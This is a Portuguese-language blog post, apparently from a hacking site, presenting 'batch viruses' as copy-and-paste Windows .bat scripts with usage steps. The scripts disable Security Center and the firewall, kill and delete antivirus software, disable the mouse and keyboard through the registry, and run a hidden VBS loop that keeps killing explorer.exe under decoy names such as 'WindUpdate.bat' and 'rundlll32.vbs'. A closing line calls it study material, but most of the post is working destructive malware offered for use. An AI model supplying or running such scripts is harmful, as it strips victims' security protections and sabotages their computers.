Criar uma Loja Virtual Grátis
PROGRAMAÇÃO BATCH

Virus em batch ( .bat ) e suas Funções! – Parte 01

Virus em Batch e suas funções!

Bom pessoal nesse primeiro artigo que escrevo sobre batch script (.bat) estarei disponibilizando alguns codigos e explicando  suas funções.

AV Killer: Esse codigo abaixo ao ser executado, Desativara a Central de Segurança do windows Xp, e Removerá praticamente todos os antivirus que estiverem instalados no sistema.

Como Usar: Copie o codigo abaixo e cole no bloco de notas e salve com a extensão .bat.  Exemplo: Avkill.bat.

@echo off
 
::-------AV Kill Invasão Hacking [UD]--------::
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:Arquivos de programasalwils~1avast4*.*
del /Q /F C:Arquivos de programasLavasoftAd-awa~1*.exe
del /Q /F C:Arquivos de programaskasper~1*.exe
cls
del /Q /F C:Arquivos de programas	rojan~1*.exe
del /Q /F C:Arquivos de programas-prot95*.dll
del /Q /F C:Arquivos de programas	bav*.dat
cls
del /Q /F C:Arquivos de programasavpersonal*.vdf
del /Q /F C:Arquivos de programasNorton~1*.cnt
del /Q /F C:Arquivos de programasMcafee*.*
cls
del /Q /F C:Arquivos de programasNorton~1Norton~1Norton~3*.*
del /Q /F C:Arquivos de programasNorton~1Norton~1speedd~1*.*
del /Q /F C:Arquivos de programasNorton~1Norton~1*.*
del /Q /F C:Arquivos de programasNorton~1*.*
cls
del /Q /F C:Arquivos de programasavgamsr*.exe
del /Q /F C:Arquivos de programasavgamsvr*.exe
del /Q /F C:Arquivos de programasavgemc*.exe
cls
del /Q /F C:Arquivos de programasavgcc*.exe
del /Q /F C:Arquivos de programasavgupsvc*.exe
del /Q /F C:Arquivos de programasgrisoft
del /Q /F C:Arquivos de programas
ood32krn*.exe
del /Q /F C:Arquivos de programas
ood32*.exe
cls
del /Q /F C:Arquivos de programas
od32
del /Q /F C:Arquivos de programas
ood32
del /Q /F C:Arquivos de programaskav*.exe
del /Q /F C:Arquivos de programaskavmm*.exe
del /Q /F C:Arquivos de programaskaspersky*.*
cls
del /Q /F C:Arquivos de programasewidoctrl*.exe
del /Q /F C:Arquivos de programasguard*.exe
del /Q /F C:Arquivos de programasewido*.exe
cls
del /Q /F C:Arquivos de programaspavprsrv*.exe
del /Q /F C:Arquivos de programaspavprot*.exe
del /Q /F C:Arquivos de programasavengine*.exe
cls
del /Q /F C:Arquivos de programasapvxdwin*.exe
del /Q /F C:Arquivos de programaswebproxy*.exe
del /Q /F C:Arquivos de programaspanda software*.*
::---------------------------::

Iniciar música WinXP: Esse codigo abaixo ao ser executado,  Começa a tocar uma musica escondida do windows XP.

Como Usar: Copie o codigo abaixo e cole no bloco de notas e salve com a extensão .bat.  Exemplo: Musica.bat

@echo off
 
::--Iniciar musica escondia WinXP--::
cd "C:Windowssystem32oobeimages"
start title.wma

Desativar Mouse: Esse codigo abaixo ao ser executado, Remove a chave de registro do mousee cria outra com a opção de desativalo.

Como Usar: Copie o codigo abaixo e cole no bloco de notas e salve com a extensão .bat.  Exemplo: DesativarMouse.bat

::-------Desativar Mouse-------::
set key="HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesMouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
::---------------------------::

Desativar Teclado: Esse codigo abaixo ao ser executado, Desabilita o registro do Teclado, fazendo assim com que ele não funcione.

Como Usar: Copie o codigo abaixo e cole no bloco de notas e salve com a extensão .bat.  Exemplo: DesativarTeclado.bat

@echo off
 
::------Desativar Teclado-----::
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINESYSTEMControlSet001ControlKeyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00, >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00, >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37, >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00, >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00, >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00, >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49, >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00, >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00, >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00, >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16, >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00, >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00, >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00, >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30, >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00, >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00, >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00, >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a, >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0, >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start nokeyboard.reg
::---------------------------::

(Mata) Fecha e Desativa o Explorer.exe : Esse codigo abaixo ao ser executado, Fecha o processo Explorer.exe e cria um arquivo .Vbs com a opção de não deixar o explorer.exe ser iniciado.

Como Usar: Copie o codigo abaixo e cole no bloco de notas e salve com a extensão .bat.  Exemplo: DesativarExplorer.exe

@echo off
 
::-----Matar Explorer.exe-----::
echo :a >>WindUpdate.bat
echo tskill explorer >>WindUpdate.bat
echo goto a >>WindUpdate.bat
echo Set objShell = CreateObject("WScript.Shell")>>rundlll32.vbs
echo strCommand = "WindUpdate.bat">>rundlll32.vbs
echo objShell.Run strCommand, vbHide, TRUE>>rundlll32.vbs
start "" rundlll32.vbs
::---------------------------::

Bom pessoal, vou encerrando por aqui a primeira parte do artigo (Virus em batch ( .bat ) e suas Funções!)  para que não fique muito grande a postagem.

E lembrando a todos que essa matéria e somente para estudos, e Recomendo que não executem esses arquivos em seu sistema pois irá danificalo. Recomendo o uso de uma maquina virtual para testar todos os codigos.